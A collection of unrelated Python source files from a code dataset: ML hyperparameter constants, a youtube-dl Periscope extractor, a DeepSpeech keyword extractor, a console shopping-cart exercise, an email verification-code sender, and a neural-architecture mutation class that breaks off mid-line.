+{"seq_id":"74856718","text":"# File: constants.py\n# ------------------\n# Default values for hyperparameters\n\n# Utilities\nLOG_FOLDER = './logging'\nMODEL_FOLDER = './models'\nDATA_FOLDER = './data'\nSAMPLE_FOLDER = './samples'\nPLOT_FOLDER = './plots'\nPLOT_EPOCH = 59\nIMG_SIZES = [64, 128, 256]\nNUM_CAPTIONS = 10\nSEQ_LENGTH = 17\n\n# Training hyperparameters\nSAVE_EVERY = 10\nSTART_EPOCH = 0\nEPOCHS = 600\nNUM_WORKERS = 8\nBATCH_SIZE = 48\nINCEPTION_LR = 0.002\nDAMSM_LR = 0.0002\nCAPTION_LR = 0.001\nGEN_LR = 0.0002\nDISC_LR = 0.0002\nGAMMA_1 = 4.0\nGAMMA_2 = 5.0\nGAMMA_3 = 10.0\nLAMBDA = 5.0\n\n# Experiment Hyperparameters\nDAMSM_NAME = 'damsm_trial_2'\nCAPTION_NAME = 'vanilla_caption'\nCAPTION_LOAD_EPOCH = -1\nDAMSM_LOAD_EPOCH = 469\nINCEPTION_MODEL_PATH = 'inception'\nINCEPTION_LOAD_EPOCH = 71\nLOAD_EPOCH = -1\nSEED = 0\n\n# LSTM Encoder Hyperparameters\n# Fix these\nEMBED_SIZE = 300\nDROPOUT_PROB = 0.5\nNUM_ENCODER_LAYERS = 3\nENCODING_SIZE = 256\nWEIGHT_RANGE = 0.1\nCA_SIZE = 100 # I set this myself\nIN_CHANNELS = 32\nZ_SIZE = 100\nDISCRIMINATOR_FILTERS = 64\nCAPTION_EMBEDDING_SIZE = 256\nCAPTION_HIDDEN_SIZE = 512\nCAPTION_NUM_LAYERS = 1\n","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"1917563","text":"# coding: utf-8\nfrom __future__ import unicode_literals\n\nfrom .common import InfoExtractor\nfrom ..utils import (\n parse_iso8601,\n unescapeHTML,\n)\n\n\nclass PeriscopeIE(InfoExtractor):\n _VALID_URL = r'https?://(?:www\\.)?periscope\\.tv/w/(?P[^/?#]+)'\n _TEST = {\n 'url': 'https://www.periscope.tv/w/aJUQnjY3MjA3ODF8NTYxMDIyMDl2zCg2pECBgwTqRpQuQD352EMPTKQjT4uqlM3cgWFA-g==',\n 'md5': '65b57957972e503fcbbaeed8f4fa04ca',\n 'info_dict': {\n 'id': '56102209',\n 'ext': 'mp4',\n 'title': 'Bec Boop - 🚠✈️🇬🇧 Fly above #London in Emirates Air Line cable car at night 🇬🇧✈️🚠 #BoopScope 🎀💗',\n 'timestamp': 1438978559,\n 'upload_date': '20150807',\n 'uploader': 'Bec Boop',\n 'uploader_id': '1465763',\n },\n 'skip': 'Expires in 24 hours',\n }\n\n def _call_api(self, method, token):\n return self._download_json(\n 'https://api.periscope.tv/api/v2/%s?token=%s' % (method, token), token)\n\n def _real_extract(self, url):\n token = self._match_id(url)\n\n replay = self._call_api('getAccessPublic', token)\n video_url = replay['replay_url']\n\n broadcast_data = self._call_api('getBroadcastPublic', token)\n broadcast = broadcast_data['broadcast']\n status = broadcast['status']\n\n uploader = broadcast.get('user_display_name') or broadcast_data.get('user', {}).get('display_name')\n uploader_id = broadcast.get('user_id') or broadcast_data.get('user', {}).get('id')\n\n title = '%s - %s' % (uploader, status) if uploader else status\n timestamp = parse_iso8601(broadcast.get('created_at'))\n\n thumbnails = [{\n 'url': broadcast[image],\n } for image in ('image_url', 'image_url_small') if broadcast.get(image)]\n\n return {\n 'id': broadcast.get('id') or token,\n 'url': video_url,\n 'ext': 'mp4',\n 'protocol': 'm3u8_native',\n 'title': title,\n 'timestamp': timestamp,\n 'uploader': uploader,\n 'uploader_id': uploader_id,\n 'thumbnails': thumbnails,\n }\n","sub_path":"youtube_dl/extractor/periscope.py","file_name":"periscope.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"636288960","text":"from deepspeech import Model\nimport soundfile as sf\nimport numpy as np\n\nimport os\nimport wave\n\n\ndef read_wav_file(filename):\n ''' \n Reads frame rate, number of frames, and buffer from WAV file.\n Must be already resampled (16kHz, mono) \n '''\n with wave.open(filename, 'rb') as w:\n rate = w.getframerate()\n frames = w.getnframes()\n buffer = w.readframes(frames)\n\n audio = np.frombuffer(buffer, dtype=np.int16)\n\n return audio, buffer, rate\n \n\ndef get_model():\n '''\n Load DeepSpeech speech-to-text model.\n '''\n model_file_path = \"models/deepspeech-0.9.3-models.pbmm\"\n lm_file_path = \"models/deepspeech-0.9.3-models.scorer\"\n\n beam_width = 100\n lm_alpha = 0.93\n lm_beta = 1.18\n\n model = Model(model_file_path)\n model.enableExternalScorer(lm_file_path)\n\n model.setScorerAlphaBeta(lm_alpha, lm_beta)\n model.setBeamWidth(beam_width)\n \n return model \n\n\ndef transcribe_batch(audio):\n ''' Get letters and timestamps '''\n model = get_model()\n return model.sttWithMetadata(audio).transcripts[0].tokens\n\n\ndef extract_keywords(metadata):\n ''' Combine letters and timestamps to form words '''\n word = ''\n transcript = []\n start = metadata[0].start_time\n \n for i, token in enumerate(metadata):\n letter = token.text\n\n if letter == ' ' or i == len(metadata):\n last_letter = metadata[i-1].start_time\n transcript.append((word, start, last_letter))\n start = token.start_time \n word = ''\n else:\n word += letter\n \n return transcript\n\n\ndef save_keywords(transcript, keyword, audio):\n ''' Save utterances in individual .wav files '''\n\n # create directory to store keywords if it doesn't exist\n if not os.path.exists(keyword):\n os.makedirs(keyword)\n \n sample_rate = 16000\n\n num_total = len(os.listdir(keyword))\n saved = 0\n\n for entry in transcript:\n word = entry[0] # keyword\n\n # save only desired keyword\n if word == keyword:\n # get start and end times\n start = int(entry[1] * sample_rate)\n end = int(entry[2] * sample_rate)\n\n # save wav file\n save_file = f\"{word}_{num_total+saved}.wav\"\n out_file_path = os.path.join(keyword, save_file)\n sf.write(out_file_path, audio[start:end], sample_rate)\n\n saved += 1\n\n return saved\n\n\ndef inspect_keywords(transcript):\n ''' Returns unique words and their frequencies. '''\n\n words = []\n\n for entry in transcript:\n word = entry[0] # keyword\n words.append(word)\n\n u_words, counts = np.unique(words, return_counts=True)\n\n word_counts = list(zip(u_words, counts))\n\n sorted_counts = sorted(word_counts, key=lambda x: x[1])\n \n return sorted_counts\n\n\ndef extract(filename, keyword):\n '''\n Extracts keywords from audio file,\n\n filename: Path to resampled audio file \n keyword: Desired keyword to collect\n '''\n print(f\"Extracting '{keyword}' utterances from {filename}.\")\n \n # time series, number of samples, sampling rate \n audio, buffer, rate = read_wav_file(filename)\n\n # tokens \n transcribed_metadata = transcribe_batch(audio=audio)\n\n # list of words with start, end times \n transcript = extract_keywords(transcribed_metadata)\n\n num_saved = save_keywords(transcript=transcript, keyword=keyword, \n audio=audio)\n\n print(f\"Utterances saved: {num_saved}\")\n\n return num_saved \n ","sub_path":"extract_words.py","file_name":"extract_words.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"549474965","text":"gou_wu_che = {}\nshnag_pin_info = {\n 101: {'name': '倚天剑', 'price': 10000},\n 102: {'name': '屠龙刀', 'price': 10000},\n 103: {'name': '九阳神功', 'price': 10000},\n 104: {'name': '九阴白骨爪', 'price': 9999},\n 105: {'name': '乾坤大挪移', 'price': 8888},\n 106: {'name': '七伤拳', 'price': 7777}\n}\ndef shopping():\n while True:\n print('*'*12,'\\n','商店','\\n','*'*12,'\\n','按1购买\\n按2结算','\\n','*'*12,sep='')\n\n key=int(input(':'))\n\n if key==1:\n show(shnag_pin_info)\n buying(gou_wu_che, shnag_pin_info)\n elif key==2:\n print('*'*12,'\\n','购物车','\\n','*'*12,sep='')\n\n show_gou_wu_che()\n\n return paying()\ndef paying():\n money = float(input('请输入金额:'))\n sum = 0\n for key in gou_wu_che:\n sum += float(gou_wu_che[key][0]) * float(gou_wu_che[key][1])\n if money > sum:\n print('应找回%.1f' % (money - sum))\n return 0\n else:\n print('金额不足')\n return 0\ndef show_gou_wu_che():\n for key in gou_wu_che:\n print(key, end=' ')\n for i in gou_wu_che[key]:\n print(i, end=' ')\n print()\ndef buying(gou_wu_che, shnag_pin_info):\n count = int(input('请输入商品编号'))\n if count not in shnag_pin_info:\n print('商品不存在')\n else:\n if count in gou_wu_che:\n gou_wu_che[count][0] += 1\n else:\n list01 = []\n list01.append(1)\n list01.append(shnag_pin_info[count]['price'])\n gou_wu_che[count] = list01\n print('添加到购物车')\ndef show(shnag_pin_info):\n for k, v in shnag_pin_info.items():\n print(k, end=' ')\n for i in v.values():\n print(i, end=' ')\n print()\nshopping()","sub_path":"mounth001/test01/home01.py","file_name":"home01.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"50439436","text":"import datetime\nimport smtplib\nfrom email.mime.text import MIMEText\nimport random\n\nfrom ResHub import settings\nfrom django.core.cache import cache\nimport redis\n\nfrom ResHub.redispool import r\n\n\ndef send_email(receive):\n msg_from = settings.FROM_EMAIL\n pwd = settings.EMAIL_PASSWORD\n msg_to = receive\n\n code = get_code()\n subject = 'Reshub'\n content = '【ResHub】验证码:' + str(code)+',您正在注册成为新用户,感谢您的支持!'\n message = MIMEText(content)\n message['Subject'] = subject\n message['From'] = msg_from\n message['To'] = msg_to\n\n s = smtplib.SMTP_SSL(\"smtp.qq.com\", 465) # 邮件服务器及端口号\n try:\n s.login(msg_from, pwd)\n s.sendmail(msg_from, msg_to, message.as_string())\n s.quit()\n r.set(msg_to, code, 3600)\n return True, code\n except Exception:\n s.quit()\n return False, code\n\n\ndef get_code():\n return random.randint(111111, 999999)\n","sub_path":"ResHub/sendMail.py","file_name":"sendMail.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"508521842","text":"import sys\nsys.path.insert(0, './src/')\n\nfrom run_protein import run_protein_expt, get_dataset\nfrom GraphMutator_helper import *\n\nimport numpy as np\nimport os\nimport random\nimport tensorflow as tf\nimport time\nimport pdb\nimport argparse\n\nfrom collections import defaultdict\n\nsuccess_flag = 0\n\nclass Mutator(object):\n\n def __init__(self, command_string):\n pass\n #########################################################################################\n # This function performs the mutation of changing the direction by randomly choosing #\n # a value for theta and phi. The range of the values are defined by the ones from the #\n # slide. #\n #########################################################################################\n \n def n_directions(self, old_string):\n print(\"Changing directions\")\n command_string_cpy = old_string\n cmd_split = old_string.split(' ')\n \n if '--feature_type' in cmd_split:\n ft_ix = cmd_split.index('--feature_type')\n cmd_split[ft_ix+1] = str(0)\n command_string = ' '.join(cmd_split)\n else:\n command_string= old_string + \" --feature_type \" + str(0)\n\n if '--theta' in cmd_split:\n theta_ix = cmd_split.index('--theta')\n cmd_split[theta_ix+1] = str(int(np.random.uniform(1,2*np.pi+1)))\n command_string = ' '.join(cmd_split)\n else:\n theta = int(np.random.uniform(1,2*np.pi+1))\n command_string= old_string + \" --theta \" + str(theta)\n \n if '--phi' in cmd_split:\n phi_ix = cmd_split.index('--phi')\n cmd_split[phi_ix+1] = str(int(np.random.uniform(1,np.pi+1)))\n command_string = ' '.join(cmd_split)\n else:\n phi = int (np.random.uniform(1,np.pi+1))\n command_string= old_string + \" --phi \" + str(phi)\n\n success_flag = 1\n return old_string, command_string, success_flag, None\n\n #########################################################################################\n # This function performs the mutation of changing the value of K by randomly choosing #\n # a value from the array. #\n #########################################################################################\n\n def n_neighbours(self, old_string):\n print(\"Changing K value for knn graph.\")\n command_string_cpy = old_string\n cmd_split = old_string.split(' ')\n k = [2,3,6,8] #Example of different values of K.\n \n if '--K' in cmd_split:\n k_ix = cmd_split.index('--K')\n cmd_split[k_ix+1] = str(k[np.random.randint(4)])\n command_string = ' '.join(cmd_split)\n else:\n k_mutated = k[np.random.randint(4)]\n command_string= old_string + \" --K \" + str(k_mutated)\n success_flag = 1\n return old_string, command_string, success_flag, None\n\n #########################################################################################\n # This function performs the mutation of randomly performing an augmentation operation. #\n # This can be either dropout, flip, rotate, any 2 or all 3. #\n #########################################################################################\n\n def agg_augment(self, old_string):\n print(\"Performing Augmentation\")\n augment_selector = np.random.choice(2,3)\n cmd_split = old_string.split(' ')\n \n if np.array_equal(augment_selector,[0,0,0]):\n print (\"No Augmentations\")\n success_flag = 1\n \n if augment_selector[0]:\n #add dropout \n print (\"Adding dropout\")\n dropout_amnt = round(np.random.uniform(0,1),2)\n cmd_split = modify_cmd_list(cmd_split, '--dropout', str(dropout_amnt))\n success_flag = 1\n \n if augment_selector[1]:\n #add rotate \n print (\"Adding Rotation\")\n rotate_intesity = np.random.randint(-15,15)\n cmd_split = modify_cmd_list(cmd_split, '--rotate', str(rotate_intesity))\n success_flag = 1\n \n if augment_selector[2]:\n #add flip\n print (\"Adding flip\")\n flip_flag = np.random.randint(2)\n cmd_split = modify_cmd_list(cmd_split, '--flip', str(flip_flag))\n success_flag = 1\n command_string = ' '.join(cmd_split)\n \n return old_string, command_string, success_flag, None\n\n def regularization_mutation(self, old_string):\n \n print(\"Adding Regularization.\")\n reg_selector = np.random.choice(2,2)\n cmd_split = old_string.split(' ')\n \n if np.array_equal(reg_selector,[0,0]):\n print (\"No Regularization added.\")\n success_flag = 0\n \n if reg_selector[0]:\n print(\"Changing L1 regularization\")\n if '--l1' in cmd_split:\n ix = cmd_split.index('--l1')\n old_l1 = cmd_split[ix+1]\n old_l1 = float(old_l1)\n if old_l1 == 0.0:\n new_l1 = np.random.uniform(0,0.001)\n else:\n new_l1 = np.random.uniform(old_l1*0.5,2*old_l1)\n print('Old L1 = %0.6f'%old_l1)\n print('New L1 = %0.6f'%new_l1)\n cmd_split[ix+1] = str(new_l1)\n else:\n cmd_split.append('--l1')\n cmd_split.append(str(round(np.random.uniform(0,0.001),4)))\n success_flag = 1\n \n if reg_selector[1]:\n print(\"Changing L2 regularization\")\n if '--l2' in cmd_split:\n ix = cmd_split.index('--l2')\n old_l2 = cmd_split[ix+1]\n old_l2 = float(old_l2)\n if old_l2 == 0.0:\n new_l2 = np.random.uniform(0,0.001)\n else:\n new_l2 = np.random.uniform(old_l2*0.5,2*old_l2)\n print('Old L2 = %0.6f'%old_l2)\n print('New L2 = %0.6f'%new_l2)\n cmd_split[ix+1] = str(new_l2)\n else:\n cmd_split.append('--l2')\n cmd_split.append(str(round(np.random.uniform(0,0.001),4)))\n success_flag = 1\n command_string = ' '.join(cmd_split)\n \n return old_string, command_string, success_flag, None\n \n ###########################################################################################\n # This mutation alters the LR using a random uniform distribution. #\n ###########################################################################################\n def learning_rate_mutation(self, old_string):\n \n \n print(\"Performing Learning rate mutation\")\n augment_selector = np.random.choice(2,3)\n cmd_split = old_string.split(' ')\n \n if np.array_equal(augment_selector,[0,0,0]):\n print (\"No learning rate mutation.\")\n success_flag = 0\n \n if augment_selector[0]:\n #Change LR \n print (\"Changing Learning rate\")\n if '--starter_learning_rate' in cmd_split:\n ix = cmd_split.index('--starter_learning_rate')\n old_lr = cmd_split[ix+1]\n old_lr = float (old_lr)\n new_lr = np.random.uniform(old_lr*0.5,2*old_lr)\n print('Old LR = %0.6f'%old_lr)\n print('New LR = %0.6f'%new_lr)\n cmd_split[ix+1] = str(new_lr)\n else:\n cmd_split.append('--starter_learning_rate')\n cmd_split.append(str(round(np.random.uniform(0,1),4)))\n success_flag = 1\n \n if augment_selector[1]:\n #Change LR step\n print (\"Changing Learning rate step\")\n iter = int(cmd_split[cmd_split.index('--num_iter')+1])\n if '--learning_rate_step' in cmd_split:\n ix = cmd_split.index('--learning_rate_step') \n old_lrs = cmd_split[ix+1]\n old_lrs = int(old_lrs)\n new_lrs = int(np.random.uniform(old_lrs*0.5,2*old_lrs))\n if new_lrs>(0.9*iter):\n new_lrs = int(0.5*iter)\n print('Old LR step = %d'%old_lrs)\n print('New LR step = %d'%new_lrs)\n cmd_split[ix+1] = str(new_lrs)\n else:\n cmd_split.append('--learning_rate_step')\n cmd_split.append(str(round(np.random.randint(int(num_iter/2),num_iter))))\n success_flag = 1\n \n if augment_selector[2]:\n print (\"Changing Learning rate exponent\")\n if '--learning_rate_exp' in cmd_split:\n ix = cmd_split.index('--learning_rate_exp')\n old_lre = cmd_split[ix+1]\n old_lre = float(old_lre)\n new_lre = np.random.uniform(old_lre*0.5,1.0)\n print('Old LR exp = %0.4f'%old_lre)\n print('New LR exp = %0.4f'%new_lre)\n cmd_split[ix+1] = str(new_lre)\n else:\n cmd_split.append('--learning_rate_exp')\n cmd_split.append(str(round(np.random.uniform(0,1),4)))\n success_flag = 1\n \n command_string = ' '.join(cmd_split)\n\n \n return old_string, command_string, success_flag, None\n\n ###########################################################################################\n # This mutation alters stride, actual functioning TBD. #\n ###########################################################################################\n def stride_mutator(self, old_string):\n power = np.random.randint(5)\n #stride = 2**power\n command_string_cpy = old_string\n cmd_split = old_string.split(' ')\n if '--stride' in cmd_split:\n s_ix = cmd_split.index('--stride')\n cmd_split[s_ix+1] = str(2**power)\n command_string = ' '.join(cmd_split)\n else:\n command_string= old_string + '--stride ' + str(2**power)\n success_flag = 1\n return old_string, command_string, success_flag, None\n\n ###########################################################################################\n # Identity mutation runs the same model for 26500 iterations. #\n ###########################################################################################\n def identity_mutation(self, old_string):\n\n cmd_split = old_string.split(' ')\n ix = cmd_split.index('--num_iter')\n dataset_idx = cmd_split.index('--dataset_name')\n if 'modelnet' in cmd_split[dataset_idx+1] :\n new_iter = np.random.randint(5000,15000)\n else:\n new_iter = np.random.randint(500,2000)\n cmd_split[ix+1] = str(new_iter)\n command_string = ' '.join(cmd_split)\n success_flag = 1\n print(\"Extending previous model for %d iterations\" % new_iter )\n \n return old_string, command_string, success_flag, None\n\n ######################################################################################################################\n # This functions mutates filter size to any odd value. It is done so by adding an additional filter size #\n # flag to the command string. Changes have been made to accomodate this in run.py, experiments.py, experiments_pcd.py#\n # and network.py. #\n ######################################################################################################################\n def filter_size_mutation(self, old_string):\n print(\"Changing Filter Size\")\n command_string_cpy = old_string\n cmd_split = old_string.split(' ')\n \n if '--filter_size' in cmd_split:\n f_ix = cmd_split.index('--filter_size')\n cmd_split[f_ix+1] = str(random.randrange(1,8,2))\n command_string = ' '.join(cmd_split)\n else:\n command_string= old_string + ' --filter_size ' + str(random.randrange(1,11,2))\n\n success_flag = 1\n return old_string, command_string, success_flag, None\n\n #########################################################################################\n # This function performs the mutation of changing the direction by randomly choosing #\n # a value for theta and phi. The range of the values are defined by the ones from the #\n # slide. #\n #########################################################################################\n\n def pool_mutation(self, old_string):\n \n print(\"Pooling mutation\")\n command_string_cpy = old_string\n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n pr_dict = {}\t\n \n fc_idx = get_layer_indices(arch_list, 'fc')\n gp_idx = get_layer_indices(arch_list, 'gmp')\n c_idx = get_layer_indices(arch_list, 'c') \n ec_idx = get_layer_indices(arch_list,'ec')\n coo_idx = get_layer_indices(arch_list,'coo')\n c_idx = c_idx + coo_idx + ec_idx\n rm_idx = get_layer_indices(arch_list,'rm')\n \n if (len(gp_idx)>0) and ('--pool_ratios' in cmd_split):\n pr_idx = cmd_split.index('--pool_ratios')\n pratios = cmd_split[pr_idx+1].split('_')\n n_pools = len(pratios)\n pr_dict = {key: val for key, val in zip(gp_idx,pratios)}\n else:\n n_pools = 0\n\n \n if len(rm_idx)==0:\n if len(fc_idx)>0:\n \n insert_index= fc_idx[0]\n rm_string = 'rm'\n #pool_string = 'gmp_'+ str(n_pools)\n arch_list.insert(insert_index, rm_string)\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n command_string = ' '.join(cmd_split)\n success_flag = 1\n else:\n print (\"Cannot Add Pooling(RM) Yet\")\n success_flag = 0\n command_string = old_string\n insert_index=None\n else:\n if len(c_idx) > 0:\n conv_check_idx = np.random.choice(c_idx)\n next_layer = arch_list[conv_check_idx+1].split('_')\n next_layer2 = arch_list[conv_check_idx+2].split('_')\n if next_layer[0] in ['rc0','rc1']:\n if next_layer2[0] in ['rm', 'gmp', 'p']:\n insert_index = None\n print (\"Pooling(/RM) Layer Already There\")\n else:\n insert_index = conv_check_idx+2\n print (\"Adding Pooling after RC\")\n else:\n if next_layer[0] in ['rm', 'gmp', 'p']:\n insert_index = None\n print (\"Pooling(/RM/ GEP) Layer Already There\")\n else:\n insert_index = conv_check_idx+1\n print (\"Adding Pooling after C\")\n \n if insert_index != None:\n if len(gp_idx)==0:\n gp_layer = 'gmp_'+ str(n_pools)\n arch_list.insert(insert_index,gp_layer)\n pool_ratio_value = round(np.random.uniform(0,1),2)\n pr_dict[insert_index] = pool_ratio_value\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n cmd_split = modify_cmd_list(cmd_split, '--pool_ratios', str(pool_ratio_value))\n \n else:\n gp_layer = 'gmp_'+ str(n_pools)\n arch_list.insert(insert_index,gp_layer)\n arch_list, pr_string = order_pooling(insert_index,gp_idx,arch_list,pr_dict)\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n cmd_split = modify_cmd_list(cmd_split, '--pool_ratios', pr_string)\n \n \n command_string = ' '.join(cmd_split)\n success_flag = 1\n \n else:\n success_flag = 0\n command_string = old_string\n \n else:\n print('Cannot add more pooling as no convolutions present.')\n success_flag = 0\n command_string = old_string\n insert_index=None\n\n \n return old_string,command_string,success_flag, insert_index\n \n\n def pool_gep_mutation(self, old_string):\n \n print(\"Pooling (GEP) mutation\")\n command_string_cpy = old_string\n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n \n fc_idx = get_layer_indices(arch_list, 'fc')\n gp_idx = get_layer_indices(arch_list, 'gmp')\n gep_idx = get_layer_indices(arch_list, 'p')\n c_idx = get_layer_indices(arch_list, 'c')\n ec_idx = get_layer_indices(arch_list,'ec')\n coo_idx = get_layer_indices(arch_list,'coo')\n rm_idx = get_layer_indices(arch_list,'rm')\n \n c_idx = c_idx + ec_idx + coo_idx\n \n gep_layer = 'p_' + str(np.random.choice([4,8,16,32,64]))\n \n if len(c_idx)>0:\n \n conv_check_idx = np.random.choice(c_idx)\n next_layer = arch_list[conv_check_idx+1].split('_')\n\n \n if next_layer[0] in ['rc0','rc1']:\n if (conv_check_idx+2)0:\n \n fc1 = fc_idx[0]\n current_layer = arch_list[fc1-1].split('_')\n if current_layer[0] == 'OC':\n print('Inserting GEP at index 1')\n insert_index = fc1\n arch_list.insert(insert_index,gep_layer)\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n command_string = ' '.join(cmd_split)\n success_flag = 1\n elif current_layer[0] in ['rm', 'gmp', 'p']:\n print(\"Pooling(/RM/GEP) Layer Already There\")\n success_flag = 0\n command_string = old_string\n insert_index=None\n else:\n print('Inserting GEP at before fc1')\n insert_index = fc1\n arch_list.insert(insert_index,gep_layer)\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n command_string = ' '.join(cmd_split)\n success_flag = 1 \n \n else:\n print('Cannot add more pooling as no convolutions present.')\n success_flag = 0\n command_string = old_string\n insert_index=None\n \n \n return old_string,command_string,success_flag, insert_index\n \n ##############################################################################################\n # This function performs the mutation of adding an FC layer at the end of the architecture. #\n # A variable specifying the desired output classes will be required and maybe even variables #\n # specifying stride and order. Right now the layer added would be of the type fc_400_1_2. #\n ##############################################################################################\n\n def add_fc(self, old_string):\n print(\"Add FC layer\")\n\n cmd_split = old_string.split(' ')\n dataset_name = cmd_split[cmd_split.index('--dataset_name')+1]\n output_classes = get_output_classes(dataset_name)\n \n if '--arch' not in cmd_split: #len(fc_idx)==0:\n arch_list = ['OC']\n fc_layer = make_layer_string('fc',output_classes)\n arch_list.append(fc_layer)\n insert_index = 1\n else:\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n fc_idx= get_layer_indices(arch_list,'fc')\n insert_index = np.random.choice(fc_idx)\n fc_size = np.random.randint(output_classes+1,500)\n fc_layer = make_layer_string('fc', fc_size)\n arch_list.insert(insert_index,fc_layer) \n \n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n command_string = ' '.join(cmd_split)\n success_flag = 1\n \n return old_string,command_string,success_flag,insert_index\n\n ###########################################################################################\n #Mutation to remove a convolution layer. #\n ###########################################################################################\n def remove_fc(self, old_string):\n print(\"Removing FC layer\")\n #command_string_cpy = old_string\n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n fc_idx = get_layer_indices(arch_list,'fc')\n fc_idx = fc_idx[:-1]\n\n if len(fc_idx)>0:\t\n remove_index = np.random.choice(fc_idx)\n print (\"Removing FC layer at \" + str(remove_index))\n del arch_list[remove_index]\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n\n command_string = ' '.join(cmd_split)\n success_flag = 1\n else:\n print (\"No Removable FC Layer present\")\n command_string = old_string\n success_flag = 0\n remove_index = 0\n \n return old_string,command_string,success_flag, remove_index\n ########################################################################################################\n # This mutation adds a conv layer in the architecture string. It works at all positions except # \n # for 0,12,13,14. At the exception position it does not add a convolution layer. The size of \t\t #\n # the conv layer is randomly chosen except for when it is added in between a conv and skip layer (rc0).#\n # Added lists that store layers where weights are kept the same and the layer where weights need to be #\n # initialized. #\n ########################################################################################################\n def add_conv_layer(self, old_string): \n print(\"Adding Conv layer\")\n #f_size = [128,256,512]\n \n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n fc_idx = get_layer_indices(arch_list, 'fc')\n rm_idx = get_layer_indices(arch_list, 'rm')\n fc_idx = sorted(fc_idx+rm_idx)\n \n if len(fc_idx)>0:\n insert_index = np.random.choice(range(1,fc_idx[0]+1))\n else:\n insert_ix = 1\n print (\"Index chosen is \" + str(insert_index))\n \n layer_string = arch_list[insert_index].split('_')\n if 'rc' in layer_string[0]:\n rc_split = layer_string[1].split('-')\n conv_filters = str(rc_split[0])\n else: \n conv_filters = np.random.choice([4,8,16,32,64,128,256,512])\n \n conv_layer= make_layer_string('c', conv_filters) \n arch_list.insert(insert_index,conv_layer)\n \n same_weights = []\n reset_weights = arch_list[insert_index]\n same_weights[1:insert_index] = arch_list[1:insert_index]\n same_weights[insert_index+1:len(same_weights)]=arch_list[insert_index+1:len(arch_list)]\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n\n command_string = ' '.join(cmd_split)\n success_flag = 1\n\n return old_string,command_string,success_flag,insert_index\n\n\n ###########################################################################################\n #Mutation to remove a convolution layer. #\n ###########################################################################################\n def remove_conv(self, old_string):\n print(\"Removing Conv layer\")\n #command_string_cpy = old_string\n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n c_idx = get_layer_indices(arch_list,'c')\n\n if len(c_idx)>0:\t\n remove_index = np.random.choice(c_idx)\n print (\"Removing Conv layer at \" + str(remove_index))\n del arch_list[remove_index]\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n\n command_string = ' '.join(cmd_split)\n success_flag = 1\n else:\n print (\"No Convolution Layer to Remove\")\n command_string = old_string\n success_flag = 0\n remove_index = 0\n \n return old_string,command_string,success_flag, remove_index\n\n ###########################################################################################\n #Mutation to remove a skip connection. #\n #rc0_128-128_1-1_1-1_1-1_1-1 ------>>>> c_128_1_1,c_128_1_1 #\n ###########################################################################################\n def remove_skip(self, old_string):\n print(\"Removing Skip connection\")\n \n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n rc_idx= sorted(get_layer_indices(arch_list,'rc0')+ get_layer_indices(arch_list,'rc1'))\n remove_index = []\n\n if len(rc_idx)>0:\n remove_index = np.random.choice(rc_idx)\n print (\"Removing rc at \" + str(remove_index))\n rc_split = arch_list[remove_index].split('_')\n conv_num = len(rc_split[1].split('-'))\n conv_list = []\n\n for i in range(0,conv_num):\n c_size = rc_split[1].split('-')\n c_string = make_layer_string('c', c_size[i])\n conv_list.append(c_string)\n\n conv_string = ','.join(conv_list)\n arch_list[remove_index] = conv_string\n cmd_list = modify_cmd_list(cmd_split, '--arch', ','.join(arch_list))\n\n command_string = ' '.join(cmd_split) \n success_flag = 1\n \n else:\n print (\"No Skip Connection to Remove\")\n command_string = old_string\n success_flag = 0\n remove_index=0\n \n return old_string,command_string, success_flag, remove_index\n\n ###########################################################################################\n #Mutation to add a skip connection. #\n #c_128_1_1,c_128_1_1 ------>>>> c_128_1-1, rc0_128-128_1-1_1-1_1-1_1-1 #\n ###########################################################################################\n\n def add_skip(self, old_string):\n print(\"Adding skip connection\")\n\n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n add_idx = []\n skip_string = \"\"\n c_idx = get_layer_indices(arch_list, 'c')\n\n if len(c_idx)>1:\t\n \n insert_index = np.random.choice(c_idx)\n present_layer = arch_list[insert_index].split('_')\n next_layer = arch_list[insert_index+1].split('_')\n \n \n if next_layer[0]== 'c':\n\n skip_con = make_layer_string('rc', None ,[present_layer[1],next_layer[1]])\n arch_list.insert(insert_index+1,skip_con)\n del arch_list[insert_index+2]\n del arch_list[insert_index]\n print (\"Deleting at pos \" + str(insert_index+2))\n success_flag = 1\n \n elif next_layer[0] in ['rc0','rc1']:\n print (\"Skip Connection already present.\")\n success_flag = 0\n insert_index = 0\n else:\n \n print (\"Two consecutive convolutions not present.\")\n success_flag = 0\n insert_index = 0\n \n same_weights = []\n reset_weights = [arch_list[insert_index],arch_list[insert_index+1]]\n same_weights[1:insert_index] = 